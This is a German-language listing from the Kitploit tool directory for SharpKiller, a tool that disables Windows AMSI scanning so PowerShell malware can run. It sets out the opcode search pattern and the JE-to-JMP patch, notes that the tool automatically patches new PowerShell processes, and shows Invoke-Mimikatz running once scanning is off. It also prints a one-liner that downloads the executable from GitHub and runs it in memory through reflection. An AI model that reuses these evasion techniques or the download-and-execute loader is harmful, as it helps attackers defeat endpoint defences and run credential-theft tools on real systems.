Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpKiller — Lebenslanger AMSI-Bypass von @ZeroMemoryEx portiert auf .NET Framework 4.8 | Kitploit
Tools/GitHubGitHub/s1lkys/sharpkiller
Privilege EscalationExploitationIDS/IPS-UmgehungPost-ExploitationRed TeamingPayload-Entwicklung
GitHubs1lkys/sharpkiller

SharpKiller

Lebenslanger AMSI-Bypass von @ZeroMemoryEx portiert auf .NET Framework 4.8

Repository anzeigen
35143vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpKiller

Lebenslanger AMSI-Bypass AMSI-Killer von @ZeroMemoryEx portiert auf .NET Framework 4.8.

Zusätzliche Verschleierung erforderlich

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Neu integrierte Funktionen:

[ x ] - Live-Scan nach neuen PowerShell-Prozessen alle 0,5 Sekunden -> Patcht automatisch neue PowerShell-Instanzen

Erstellen der Lösung

  • Setzen Sie Ihre Plattform explizit auf x64 in Build > Konfigurations-Manager

Wie funktioniert es?

Opcode-Scan

  • Wir erhalten die genaue Adresse der Sprunganweisung, indem wir nach dem ersten Byte jeder Anweisung suchen. Diese Technik ist selbst bei Updates oder Änderungen des Zieldatensatzes effektiv.

  • zum Beispiel:

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • Das Suchmuster sieht folgendermaßen aus:

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Patch

Vor dem Patch

  • Das Programm testet den Wert von RDX gegen sich selbst. Wenn der Vergleich 0 ergibt, führt das Programm einen Sprung zur Rückkehr aus. Andernfalls fährt das Programm mit der Auswertung der nächsten Anweisung fort.

    image

  • Wir können "Invoke-Mimikatz" nicht ausführen.

    image

Nach dem Patch

  • Wir patchen das erste Byte und ändern es von JE zu JMP, sodass es direkt zurückkehrt.

    Screenshot 2023-02-26 195848

    image

  • Jetzt können wir "Invoke-Mimikatz" ausführen.

Neu erstellte Prozesse

  • Sharp-Killer patcht alle neu erstellten PowerShell-Prozesse nahezu in Echtzeit.

Video-Demo

video

OneLiner zur Ausführung mit Reflection

root@kitploit:~
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

Dieser Fehler tritt bei Verwendung des genannten OneLiners auf?

Falls Sie diese Meldung jemals gesehen haben und sich gefragt haben – willkommen bei der .NET AMSI-Schnittstelle! :-)

root@kitploit:~
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."
  • https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/

Referenzen:

  • https://github.com/ZeroMemoryEx/Amsi-Killer
Tool herunterladen